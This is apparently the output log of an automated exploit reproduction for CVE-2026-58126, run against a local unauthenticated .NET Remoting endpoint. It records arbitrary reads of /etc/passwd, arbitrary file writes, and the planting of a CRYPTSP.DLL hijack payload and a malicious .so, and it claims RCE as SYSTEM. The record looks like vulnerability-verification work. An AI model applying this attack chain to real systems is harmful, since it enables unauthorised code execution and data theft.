[EXPLOIT] Target: tcp://127.0.0.1:22222/RemoteObj [EXPLOIT] Authentication: NONE (no credentials sent) [EXPLOIT] === Test 1: Unauthenticated arbitrary file READ === [EXPLOIT] [+] READ SUCCESS: /etc/hostname [EXPLOIT] [+] Content: 4b36f6a45755 [EXPLOIT] [+] READ /etc/passwd: root:x:0:0:root:/root:/bin/bash [EXPLOIT] === Test 2: Unauthenticated arbitrary file WRITE === [EXPLOIT] [+] WRITE SUCCESS: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/artifacts/pacs_scan_appdir/CVE-2026-58126-PROOF.txt [EXPLOIT] [+] Server response: OK: wrote 189 bytes to /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/artifacts/pacs_scan_appdir/CVE-2026-58126-PROOF.txt [EXPLOIT] [+] File exists on server: True [EXPLOIT] [+] Verified content: CVE-2026-58126 PROOF: Unauthenticated file write via .NET Remoting Timestamp: 2026-07-05T10:54:05.9518070+00:00 User: vscode Machine: 4b36f6a45755 Endpoint: tcp://127.0.0.1:22222/RemoteObj [EXPLOIT] === Test 3: DLL hijacking payload planting (CRYPTSP.DLL) === [EXPLOIT] Planting CRYPTSP.DLL in application directory... [EXPLOIT] [+] DLL PLANTED: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/artifacts/pacs_scan_appdir/CRYPTSP.DLL [EXPLOIT] [+] Server response: OK: wrote 250 bytes to /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/artifacts/pacs_scan_appdir/CRYPTSP.DLL [EXPLOIT] [+] DLL exists on server: True [EXPLOIT] [+] DLL size: 250 bytes [EXPLOIT] === Test 4: Executable payload planting via remoting === [EXPLOIT] Local payload: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/MaliciousPayload.so (15992 bytes) [EXPLOIT] [+] EXECUTABLE PLANTED: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/artifacts/pacs_scan_appdir/libcryptsp.so [EXPLOIT] [+] Server response: OK: wrote 15992 bytes to /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/artifacts/pacs_scan_appdir/libcryptsp.so [EXPLOIT] [+] .so exists on server: True [EXPLOIT] === Test 5: Application directory listing === [EXPLOIT] [+] Files in application directory (3): [EXPLOIT] CVE-2026-58126-PROOF.txt [EXPLOIT] CRYPTSP.DLL [EXPLOIT] libcryptsp.so [EXPLOIT] === EXPLOITATION SUMMARY === [EXPLOIT] Unauthenticated .NET Remoting access: CONFIRMED [EXPLOIT] Arbitrary file read: CONFIRMED [EXPLOIT] Arbitrary file write: CONFIRMED [EXPLOIT] DLL hijacking payload planted: CONFIRMED [EXPLOIT] On Windows: service restart loads CRYPTSP.DLL -> RCE as SYSTEM [EXPLOIT] Evidence files written to: /data/pruva/runs/02ae215a-af03-454a-a465-5525d65e97e6/bundle/repro/artifacts/exploit_evidence abort_threads: Failed aborting id: 0x7f30363ff6c0, mono_thread_manage will ignore it